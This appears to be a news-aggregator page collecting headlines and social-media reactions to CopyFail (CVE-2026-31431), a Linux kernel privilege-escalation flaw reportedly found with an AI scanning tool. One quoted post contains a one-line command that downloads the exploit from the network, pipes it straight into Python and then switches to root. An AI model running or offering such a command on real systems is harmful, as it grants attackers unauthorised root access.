Researchers detail CopyFail, a now-patched Linux vulnerability that lets unprivileged users gain admin access, as many distributions have yet to apply the fixes
Publicly released exploit code for an effectively unpatched vulnerability that gives root access to virtually all releases of Linux …
Ars Technica Dan Goodin
Related Coverage
- Copy Fail — CVE-2026-31431 Copy Fail
- Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. Xint
- What we know about Copy Fail (CVE-2026-31431) Bugcrowd
- New Linux ‘Copy Fail’ flaw gives hackers root on major distros BleepingComputer · Bill Toulas
- Re: CVE-2026-31431: CopyFail: linux local privilege scalation SecLists.Org Security Mailing … · Eddie Chapman
- Linux Kernel 0-Day “Copy Fail” Roots Every Major Distribution Since 2017 Cyber Security News · Guru Baran
- New vulnerability in Linux. Named copy.fail. Pretty much all standard Linux kernels have this. And “The same 732-byte Python script roots every Linux distribution shipped since 2017”. But the attacker has to have foothold on that Linux host, so any shared Linux box is in question. … @arackhaen
- “The most severe Linux threat to surface in years catches the world flat-footed — CopyFail threatens multi-tenant servers, CI/CD work flows, Kubernetes containers, and more. https://arstechnica.com/... “Copy Fail requires only an unprivileged local user account” — https://copy.fail/ … @scottish@datasci.social
- New Linux vulnerability just dropped! — The most severe Linux threat to surface in years catches the world flat-footed — https://arstechnica.com/... #Linux #Vulnerability #Security #OpenSource #Tech — [image] @majorlinux@toot.majorshouse.com
- For Linux kernel vulnerabilities, there is no heads-up to distributions Hacker News
- Copy Fail Hacker News
- New Linux ‘Copy Fail’ Vulnerability Enables Root Access On Major Distros Slashdot · BeauHD
- As the most severe Linux threat in years surfaces, the world scrambles Ars OpenForum
- The most severe Linux threat to surface in years catches the world flat-footed: — CopyFail threatens multi-tenant servers, CI/CD work flows, Kubernetes containers, and more. — Publicly released exploit code for an effectively unpatched vulnerability that gives root access to virtually … @kubikpixel@chaos.social
- Oh damn. Local privilege escalation to root, on any Linux distro since 2017 with the kernel crypto API (AF_ALG) enabled. — Patch your Linux boxen folks! — https://copy.fail/ @philpem@digipres.club
- Linux exploit instantly grants administrator access on most distributions since 2017 — cryptography optimization snafu grants root privileges to local users Tom's Hardware · Bruno Ferreira
- Nine-Year-Old Zero-Day Flaw in Linux Kernel Discovered by AI-Equipped Security Researcher Infosecurity · Kevin Poireault
- AI tools have made vulnerability exploitation faster and easier TechRadar · Ronald Lewis
- Nine-year-old Linux kernel flaw enables reliable local privilege escalation (CVE-2026-31431) Help Net Security · Zeljka Zorz
- Nearly every Linux system built since 2017 vulnerable to ‘Copy Fail’ flaw The Record · Alexander Martin
- ‘An hour of scan time is all it took’: “Copy Fail” flaw impacts all Linux kernels released since 2017, so patch now or face the consequences TechRadar · Mike Moore
- 5 truths I discovered while spring cleaning my tech PCWorld
- Copy.Fail: Universal Linux Local Privilege Escalation Vulnerability Wiz Blog
- Linux Kernel “Copy Fail” Local Privilege Escalation (LPE), CVE-2026-31431, Under Active Exploitation XM Cyber
- Linux faces its largest security threat in years—here's how to deal with Copy Fail How-To Geek · Jon Fingas
- Severe Linux Copy Fail security flaw uncovered using AI scanning help The Verge · Stevie Bonifield
- “Copy Fail” is a rare Linux bug that can turn an unprivileged user into a root admin in seconds TechSpot · Alfonso Maruccia
- Copy Fail Linux Kernel Flaw Allows Local Users to Gain Root Linuxiac · Bobby Borisov
- Linux ‘Copy Fail’ Flaw Delivers Root-Level Access to Distros HealthcareInfoSecurity.com · Mathew J. Schwartz
- “Copy Fail” gives root access to all Linux systems via 732-byte exploit CyberInsider · Bill Mann
- New Linux ‘Copy Fail’ Vulnerability Enables Root Access on Major Distributions The Hacker News
Discussion
-
@cybersecurity__
@cybersecurity__
on x
It's that shared kernel. 🤷♂️ BTW, this is why you want unprivileged pods/containers. And don't put a shell in a container unless you need it and never for production.
-
@cyb3rmonk
Mehmet Ergene
on x
If an adversary is executing Copy Fail (CVE-2026-31431) on your Linux box, you have a bigger problem: Your current detections already failed to detect an adversary that is already inside your environment. Focus on adversary behaviors, not vulnerability exploits. Adversaries
-
@cyb3rops
Florian Roth
on x
People started uploading Copy Fail exploit binaries and PoCs to VirusTotal Our generic YARA rules, some written years ago, already hit these samples pretty well That's the nice thing about generic detection logic. You don't always need to know the CVE name, the new exploit [image…
-
@vxunderground
@vxunderground
on x
God damn, this CopyFail has the most intense Linux nerds coming out. People are commenting all sorts of stuff and I have ZERO CLUE what they're talking about. Bro, I do WINDOWS MALWARE. You honestly think I have any idea how Linux actually works under the hood? I don't remember
-
@vxunderground
@vxunderground
on x
CVE-2026-31431 a/k/a CopyFail > Linux LPE > Description sounds like AI slop > Exploit is legit > Impacts every Linux kernel from 2017 - Now > Proof-of-concept released > It's Wednesday? https://copy.fail/
-
@brian_pak
Brian Pak
on x
Surfaced by Xint Code — our AI vuln research platform — pointed at the kernel's crypto/ for about an hour, on a starting hunch from @5unKn0wn. Came back with CopyFail (plus others, still in coordinated disclosure). Write-up + PoC (exploit): https://copy.fail/ Xint Code:
-
@celestepoasts
Celeste
on x
we'll have flying cars in the future [image]
-
@brian_pak
Brian Pak
on x
Time to talk about this one. CopyFail (CVE-2026-31431) — a 732-byte Python script that roots every Linux distro shipped since 2017. 🧵
-
@sekurlsa_pw
@sekurlsa_pw
on x
Introduced: https://git.kernel.org/... Fixed https://git.kernel.org/... Every distro has a page seen in the image. That one is from Debian. Kali is based on Debian testing so Forky. So in theory Kali should not be vulnerable if updated. [image]
-
@c2iris
@c2iris
on x
Linux is absolutely chalked full of bugs like this The open source nature of Linux has not contributed to it being any more secure Any Linux cultist that argues otherwise should be ignored
-
@intcyberdigest
@intcyberdigest
on x
‼️🚨 BREAKING: An AI found a Linux kernel zero-day that roots every distribution since 2017. The exploit fits in 732 bytes of Python. Patch your kernel ASAP. The vulnerability is CVE-2026-31431, nicknamed “Copy Fail,” disclosed today by Theori. It has been sitting quietly in the […
-
@tj_null
Tony
on x
Can confirm this exploit works. I have tested it on a few Linux distros since it was released.
-
@patentpulse
@patentpulse
on x
@brian_pak I don't really get why this full exploit code was published before patches are available for most distros? And most, especially shared servers, are updated. So rather a few months after disclosure. Now, there are still no updates for most popular distros and...
-
@taggart-tech.com
Taggart
on bluesky
Yeah I tested CopyFail. It's real. Yikes.
-
r/linux
r
on reddit
Short and easy to understand: “Copy-Fail CVE-2026-31431” What is it and how do I mitigate it with an Open Source Tool
-
r/sysadmin
r
on reddit
Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years.
-
r/cybersecurity
r
on reddit
Copy.fail - unprivileged to root in a small python script. Many distros still unpatched
-
r/linux
r
on reddit
Copy Fail is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms.
-
r/netsec
r
on reddit
Copy Fail exploit lets 732 bytes hijack Linux systems and quietly grab root
-
r/technology
r
on reddit
Copy Fail: Newly Discovered Vulnerability Allows Privilege Escalation To Root On All Major Linux Distros Since 2017
-
r/programming
r
on reddit
Copy Fail: an exploit for all Linux distributions since 2017
-
r/Ubuntu
r
on reddit
Copy Fail is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms.
-
r/linuxsucks101
r
on reddit
Copy Fail — 732 Bytes to Root
-
r/hacking
r
on reddit
Copy Fail — 732 Bytes to Root
-
r/AsahiLinux
r
on reddit
FYI — Nasty exploit revealed today that affects kernel 6.19 that is currently in use.
-
Joshua Drake
Joshua Drake
on linkedin
I would like to take a moment to admire the Linux horror movie that was just released: — curl https://copy.fail/exp | python3 && su — And yes, it works. …
-
Volodymyr Tsap
Volodymyr Tsap
on linkedin
🚩🚩🚩ALARM! — All Linux servers you are running are vulnerable to privilege escalation - almost all of them. …
-
@veronica@mastodon.online
Veronica Olsen
on mastodon
Oops?! — My Debian 12 boxes seem to be unaffected at least. (The exploit doesn't work at least.) — Update: Debian 13 has been patched (trixie security). — https://copy.fail/ #CopyFail #InfoSec
-
r/openSUSE
r
on reddit
The most severe Linux threat to surface in years catches the world flat-footed - Ars Technica
-
Dan Elder
Dan Elder
on linkedin
It's a bad day for Linux admins. Any user can gain root access on almost any Linux distribution released since 2017. …
-
r/Ubuntu
r
on reddit
Active Incident: Massive DDOS Attack on Ubuntu